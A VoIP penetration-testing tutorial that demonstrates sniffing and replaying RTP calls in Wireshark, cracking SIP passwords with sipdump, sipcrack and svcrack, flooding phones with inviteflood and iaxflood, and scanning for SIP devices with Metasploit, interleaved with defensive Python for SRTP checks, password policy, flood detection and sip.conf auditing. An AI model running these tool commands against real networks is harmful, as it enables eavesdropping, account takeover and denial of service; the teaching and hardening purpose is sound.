VoIP Sniffing Cracking Phishing & Metasploit Testing Tutorial

We discussed VoIP penetration testing and its security risks in the first part; this is the second part of that series. VoIP and wireless security are important fields to discuss because the security risks are very high. Below is a demonstration of VoIP hacking with different tools; the operating system used for the demonstration was Linux BackTrack 5 R2.


Sniffing on VoIP Network

The concept of sniffing on a VoIP network is the same as the general
network sniffing concept. I will use some of the most well-known tools to
demonstrate a sniffing attack on a VoIP network. Let us start with
Wireshark, which is able to capture VoIP traffic.

Now let's suppose the end users (extensions) are busy
communicating with each other, and that an attacker is trying to
capture some traffic so that he/she will be able to get the data (their
communication).


Wireshark has captured some traffic. As discussed earlier in the
protocol section, the RTP stream carries the media. The question now is:
how do we extract information from these packets? Wireshark provides
the option to extract it with a built-in feature for VoIP: click on the
Telephony menu, then on VoIP Calls. You will then get this window:


Click on Player, then on Decode. You are now able to listen in to this
communication, because all of the audio data is available in the capture.

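The reason Wireshark can play the call back is that plain RTP (negotiated in the SDP as RTP/AVP) carries the audio as cleartext codec frames; only SRTP (RTP/SAVP) encrypts the payload, and the RTP header looks identical in both cases. The following added example (my own code, not part of the original tutorial or of Wireshark) parses the RFC 3550 fixed header of a constructed G.711 packet and checks a constructed SDP offer for whether SRTP was negotiated, which is the check a reviewer of a capture wants before concluding that the audio is exposed. The packet bytes, the SDP text and the key placeholder in it are all constructed for the example.

```python
import struct

# Static audio payload types from RFC 3551; all of these are cleartext
# codec frames unless the session negotiated SRTP.
STATIC_PAYLOAD_TYPES = {
    0: "PCMU (G.711 u-law)",
    3: "GSM",
    8: "PCMA (G.711 A-law)",
    9: "G.722",
    18: "G.729",
}


def parse_rtp_header(packet: bytes) -> dict:
    """Decode the RFC 3550 fixed header plus any CSRC and extension words."""
    if len(packet) < 12:
        raise ValueError("shorter than the 12-byte RTP fixed header")
    b0, b1, seq, timestamp, ssrc = struct.unpack("!BBHII", packet[:12])
    version = b0 >> 6
    if version != 2:
        raise ValueError(f"unexpected RTP version {version}")
    csrc_count = b0 & 0x0F
    header_len = 12 + 4 * csrc_count
    has_extension = bool(b0 & 0x10)
    if has_extension:
        # extension = 16-bit profile, 16-bit length in 32-bit words, then data
        if len(packet) < header_len + 4:
            raise ValueError("truncated RTP header extension")
        ext_words = struct.unpack("!H", packet[header_len + 2:header_len + 4])[0]
        header_len += 4 + 4 * ext_words
    if len(packet) < header_len:
        raise ValueError("truncated RTP header")
    payload_type = b1 & 0x7F
    return {
        "version": version,
        "padding": bool(b0 & 0x20),
        "extension": has_extension,
        "marker": bool(b1 & 0x80),
        "payload_type": payload_type,
        "codec": STATIC_PAYLOAD_TYPES.get(payload_type, "dynamic/unknown"),
        "sequence": seq,
        "timestamp": timestamp,
        "ssrc": ssrc,
        "payload_len": len(packet) - header_len,
    }


def sdp_audio_is_srtp(sdp: str) -> bool:
    """True only if every audio m= line negotiates SRTP (RTP/SAVP or RTP/SAVPF).
    RTP/AVP is plain RTP, which Wireshark can decode and play."""
    media = [line for line in sdp.splitlines() if line.startswith("m=audio")]
    if not media:
        return False
    return all(line.split()[2] in ("RTP/SAVP", "RTP/SAVPF") for line in media)


def media_exposure_report(packet: bytes, sdp: str) -> str:
    """One-line verdict on whether the captured media is listenable."""
    hdr = parse_rtp_header(packet)
    if sdp_audio_is_srtp(sdp):
        return f"PT {hdr['payload_type']} ({hdr['codec']}): SRTP negotiated, payload encrypted"
    return (f"PT {hdr['payload_type']} ({hdr['codec']}): plain RTP, "
            f"{hdr['payload_len']} bytes of cleartext audio per packet")


# Constructed sample packet: one G.711 u-law frame, 20 ms of audio (160 samples).
SAMPLE_RTP = (
    bytes([0x80, 0x00])                        # V=2, no P/X/CC; M=0, PT=0 (PCMU)
    + struct.pack("!HII", 1, 160, 0xDEADBEEF)  # sequence, timestamp, SSRC
    + b"\xff" * 160                            # u-law payload bytes
)

# Constructed SDP offers as they would appear in a SIP INVITE body.
PLAIN_SDP = "v=0\r\nm=audio 10000 RTP/AVP 0 8\r\na=rtpmap:0 PCMU/8000\r\n"
SRTP_SDP = ("v=0\r\nm=audio 10000 RTP/SAVP 0\r\n"
            "a=crypto:1 AES_CM_128_HMAC_SHA1_80 inline:<constructed-key-placeholder>\r\n")

if __name__ == "__main__":
    print(media_exposure_report(SAMPLE_RTP, PLAIN_SDP))
    print(media_exposure_report(SAMPLE_RTP, SRTP_SDP))
```

Because the RTP header alone cannot tell you whether the payload is encrypted, the SDP transport is the decisive field: if the signalling negotiated RTP/AVP, anyone positioned to capture the stream can do what the Wireshark player does above.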

SIP Authentication Cracking (VoIP Cracking)


The importance of passwords is no secret, so in this section I will
show you how to crack the password of any extension (user) on a VoIP
network. This attack is the most dangerous, because if an attacker knows
your password, then he/she will be able to authenticate on the network
using your identity.

The Wireshark capture can be used for authentication cracking. Save
the capture as name.pcap; we will now use a wonderful tool called
SIPcrack. It contains two programs: sipdump, which dumps the
authentication data from the capture into a file of hashes, and
sipcrack, which cracks the VoIP password from that file.


[email protected]:~/Desktop/SIPcrack# ./sipdump pass.txt -p aa.pcap

SIPdump 0.3pre ( MaJoMu | www.codito.de )
---------------------------------------

* Using pcap file 'aa.pcap' for sniffing
* Starting to sniff with packet filter 'tcp or udp'
* Dumped login from 192.168.1.9 -> 192.168.1.3 (User: '600')

Exiting, sniffed 1 logins

Sipcrack then needs a wordlist to launch the attack on the dumped
hashes. As a result, it will give you the password.
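What sipdump writes out is the SIP digest authentication exchange: the username, realm, nonce, method and URI from the REGISTER, and the response value the phone computed from them plus its password. Everything except the password is visible on the wire, so the registrar's own verification routine is also the routine an offline wordlist attack runs once per candidate, and the only thing that decides the outcome is the strength of the extension's password. The added example below (my own code, not from the tutorial, SIPcrack or Asterisk) implements the registrar-side verification for the qop-less RFC 2617 digest variant (assumed here to be what the page's Asterisk 1.6 PBX negotiated) and a provisioning-time password policy check that rejects the kind of secret shown in the tutorial. The challenge values are constructed, not taken from any capture.

```python
import hashlib
import hmac
import re


def _md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def sip_digest_response(username: str, realm: str, password: str,
                        method: str, uri: str, nonce: str) -> str:
    """RFC 2617 digest without qop: the value a phone sends in the
    Authorization header's response= field. Every input except
    `password` appears in cleartext in the REGISTER exchange."""
    ha1 = _md5_hex(f"{username}:{realm}:{password}")
    ha2 = _md5_hex(f"{method}:{uri}")
    return _md5_hex(f"{ha1}:{nonce}:{ha2}")


def registrar_verify(username: str, realm: str, stored_password: str,
                     method: str, uri: str, nonce: str, response: str) -> bool:
    """What the PBX does with a REGISTER: recompute the digest from the
    stored secret and compare in constant time."""
    expected = sip_digest_response(username, realm, stored_password, method, uri, nonce)
    return hmac.compare_digest(expected, response)


# A small list of values seen far too often as SIP secrets (constructed list).
COMMON_SECRETS = {"1234", "12345", "123456", "password", "admin"}


def password_policy_findings(extension: str, password: str) -> list:
    """Provisioning-time checks. Each finding means a wordlist or a
    brute-force run against the captured digest has a realistic chance."""
    findings = []
    if len(password) < 12:
        findings.append("shorter than 12 characters")
    if password.isdigit():
        findings.append("digits only (a PIN-sized keyspace)")
    if extension in password:
        findings.append("contains the extension number")
    if re.fullmatch(r"(.)\1*", password) or password.lower() in COMMON_SECRETS:
        findings.append("common or repeated value")
    return findings


# Constructed challenge, as a registrar would send it in a 401 to extension 600.
CHALLENGE = {"realm": "asterisk", "nonce": "0123abcd",
             "method": "REGISTER", "uri": "sip:192.168.1.9"}

if __name__ == "__main__":
    # The phone side: compute the response with its configured secret.
    resp = sip_digest_response("600", CHALLENGE["realm"], "12345",
                               CHALLENGE["method"], CHALLENGE["uri"], CHALLENGE["nonce"])
    # The registrar side: verify against the stored secret.
    print("registrar accepts:", registrar_verify("600", CHALLENGE["realm"], "12345",
          CHALLENGE["method"], CHALLENGE["uri"], CHALLENGE["nonce"], resp))
    print("policy findings for '12345':", password_policy_findings("600", "12345"))
    print("policy findings for a long random secret:",
          password_policy_findings("600", "Xq7#vL2mPz9!wR"))
```

Two mitigations follow directly from the computation: a long, non-numeric secret per extension makes the offline search impractical, and running SIP signalling over TLS keeps the digest exchange out of the capture in the first place.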


Another wonderful tool that will help you crack SIP passwords is
svcrack. Like the others, it can be found in the SIPVicious tool suite.
Svcrack is wonderful for brute-force attacks on SIP accounts.


[email protected]:/pentest/voip/sipvicious# ./svcrack.py -u600 -d list.txt 192.168.1.9

| Extension | Password |
------------------------
| 600       | 12345    |

Denial of Service Attack on VoIP Network

A denial of service (DoS) attack is a dangerous attack that can cause
the VoIP network and its devices to crash. Inviteflood is the tool used
to launch DoS attacks against any extension (user) on the VoIP
network. Usage:

./inviteflood interface targetuser targetdomain floodtarget numberofpackets

./inviteflood eth0 600 192.168.1.3 192.168.1.3 200000

It behaves like a "ping of death" attack: it will crash the end user's
operating system, disabling his/her ability to make any calls.


Iaxflood is another good tool; it floods the IAX2 protocol, and the
usage is very simple:

[email protected]:/pentest/voip/iaxflood# ./iaxflood

usage: ./iaxflood sourcename destinationname numpackets

A simple run looks like this:

[email protected]:/pentest/voip/iaxflood# ./iaxflood 192.168.1.13 192.168.1.2 10000

Will flood port 4569 from port 4569 10000 times

We have IP_HDRINCL

Number of Packets sent:
Sent 10000

[email protected]:/pentest/voip/iaxflood#
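Unlike sipcrack, which works offline on a capture, svcrack guesses against the live PBX, and inviteflood and iaxflood are pure volume: both leave a signature that is easy to spot from the registrar's point of view, a burst of rejected REGISTERs from one source, or an INVITE rate no phone produces. The added example below (my own code, not from the tutorial or from any of the tools shown) runs sliding-window detection over a constructed log of SIP requests; the record format is invented for the example (timestamp, source address, method, final response code), and the thresholds (5 rejected REGISTERs in 60 s, 100 INVITEs in 1 s) are assumptions to tune per site. The same counting logic applies to IAX2 NEW frames on UDP 4569 for the iaxflood case, but the example sticks to SIP.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed record format (not any tool's real output):
#   <ISO-8601 timestamp> <source-ip> <SIP method> <final response code or ->
SAMPLE_LOG = "\n".join(
    ["2012-05-01T09:59:50.000 192.168.1.5 REGISTER 401",    # normal: one challenge
     "2012-05-01T09:59:50.200 192.168.1.5 REGISTER 200",    # then success
     "2012-05-01T09:59:55.000 192.168.1.5 INVITE 200"]
    # a guessing tool: one REGISTER every 2 s, each rejected with 403
    + [f"2012-05-01T10:00:{i:02d}.000 192.168.1.13 REGISTER 403" for i in range(0, 16, 2)]
    # a flood: 150 INVITEs inside 150 ms, no response recorded
    + [f"2012-05-01T10:01:00.{i:03d} 192.168.1.13 INVITE -" for i in range(150)]
)

# Rule table. A legitimate phone normally sees exactly one 401 challenge per
# registration, so a single rejection is never an alert; the window count is.
RULES = {
    "REGISTER brute force": {"method": "REGISTER", "rejected_only": True,
                             "window": timedelta(seconds=60), "threshold": 5},
    "INVITE flood": {"method": "INVITE", "rejected_only": False,
                     "window": timedelta(seconds=1), "threshold": 100},
}
REJECTIONS = {"401", "403", "407"}


def parse_line(line: str):
    ts, src, method, status = line.split()
    return datetime.fromisoformat(ts), src, method, status


def detect(log_text: str) -> list:
    """Return one alert per (rule, source) the first time it crosses threshold."""
    windows = defaultdict(deque)   # (rule name, source ip) -> timestamps in window
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, method, status = parse_line(line)
        for name, rule in RULES.items():
            if method != rule["method"]:
                continue
            if rule["rejected_only"] and status not in REJECTIONS:
                continue
            q = windows[(name, src)]
            q.append(ts)
            # drop timestamps that have aged out of the window
            while q and ts - q[0] > rule["window"]:
                q.popleft()
            if len(q) >= rule["threshold"] and (name, src) not in alerted:
                alerted.add((name, src))
                alerts.append({"rule": name, "source": src,
                               "count": len(q), "at": ts.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(f"{alert['at']}  {alert['rule']:22s} from {alert['source']} "
              f"({alert['count']} in window)")
```

In production the alert would feed a firewall rule or a fail2ban-style ban on the source address; the per-source queue is what keeps a busy but legitimate phone from tripping either rule.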

Metasploit on VoIP Penetration Testing

Metasploit has several auxiliary modules for VoIP networks. Here is a
list of some of the best Metasploit auxiliary modules for VoIP hacking:

  • auxiliary/scanner/sip/options (to find SIP-enabled devices)
  • auxiliary/scanner/sip/enumerator (to enumerate the extensions)

We can do basic VoIP network penetration testing by using Metasploit
auxiliary modules for information gathering and enumeration. We can
scan an entire network to find SIP-enabled devices, and the Metasploit
auxiliary modules are fast.


msf > use auxiliary/scanner/sip/options
msf auxiliary(options) > set RHOSTS 192.168.1.1/24
RHOSTS => 192.168.1.1/24
msf auxiliary(options) > run

[*] 192.168.1.3 sip:[email protected] agent='WAcjCpW'
[*] 192.168.1.9 200 agent='Asterisk PBX 1.6.0.26-FONCORE-r78' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
[*] 192.168.1.9 200 agent='Asterisk PBX 1.6.0.26-FONCORE-r78' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(options) >
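The OPTIONS scan above works because the PBX answers every unauthenticated OPTIONS with its full User-Agent string, and the enumerator module works when the PBX answers differently for extensions that exist and ones that do not. Both are chan_sip configuration matters. The added example below (my own code, not from the tutorial, Metasploit or Asterisk) audits a sip.conf for the three [general] settings involved, alwaysauthreject, allowguest and useragent, which are real Asterisk chan_sip options, plus the per-peer secret; the two configurations are constructed, and the audit conservatively treats a missing alwaysauthreject as not hardened rather than relying on the version-dependent default.

```python
import re

# Two constructed chan_sip configurations. The option names are real
# sip.conf settings; the values and the peer are made up for the example.
WEAK_CONF = """
[general]
context=default
allowguest=yes          ; unauthenticated INVITEs are accepted
alwaysauthreject=no     ; 404 for unknown users, 401 for known ones: enumerable
; useragent left at the default, "Asterisk PBX <version>"

[600]
type=friend
secret=12345
"""

HARDENED_CONF = """
[general]
context=default
allowguest=no
alwaysauthreject=yes    ; unknown and known users get the same rejection
useragent=PBX           ; hides the version string an OPTIONS scan reports

[600]
type=friend
secret=Xq7#vL2mPz9!wR
"""


def parse_asterisk_conf(text: str) -> dict:
    """Minimal parser: [section] headers, key=value or key=>value lines,
    ';' comments. Enough for an audit; not a full Asterisk config loader."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        header = re.fullmatch(r"\[([^\]]+)\]", line)
        if header:
            current = header.group(1)
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip()] = value.lstrip(">").strip()
    return sections


def audit_sip_conf(sections: dict) -> list:
    """Findings that map directly onto the scanner and enumerator modules."""
    general = sections.get("general", {})
    findings = []
    if general.get("allowguest", "yes").lower() != "no":   # Asterisk default is yes
        findings.append("allowguest is not 'no': unauthenticated calls are accepted")
    if general.get("alwaysauthreject", "no").lower() != "yes":
        findings.append("alwaysauthreject is not 'yes': the response code reveals "
                        "which extensions exist (what the enumerator module relies on)")
    agent = general.get("useragent", "Asterisk PBX")
    if agent.startswith("Asterisk"):
        findings.append(f"useragent '{agent}' identifies the product (and by default "
                        "its version) to every OPTIONS probe")
    for name, peer in sections.items():
        secret = peer.get("secret")
        if secret is not None and (secret.isdigit() or len(secret) < 12):
            findings.append(f"[{name}] secret is numeric or shorter than 12 characters")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label} ==")
        for finding in audit_sip_conf(parse_asterisk_conf(conf)) or ["no findings"]:
            print(" -", finding)
```

The first three findings are what the Metasploit output above reveals from the outside; the secret check is the same policy that decides the outcome of the cracking section.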

VoIP Phishing

Security awareness is very important. Before
concluding this article, I just want to briefly discuss VoIP
phishing. Phishing is not a new attack – it is pretty old school –
but it remains a threat because hackers usually use some social
engineering technique to trick a user before stealing his/her
credentials. You might have heard about email phishing, in
which an attacker directs the victim to a fake page so that they
will enter their confidential information. In the same fashion, a
hacker can hijack your calls to get your credentials.

Let's suppose someone receives a call or email like this:

"Hi, this is an urgent email (call) that has been generated by the
network administrator. We have found something wrong with your
account, so please call back at XXXX-XXXX-XXX to verify your account."

Typically, an unwary user will call back, and the hacker may then ask
for some confidential information. You need to understand the risk;
educate the people around you.




Ehacking Staff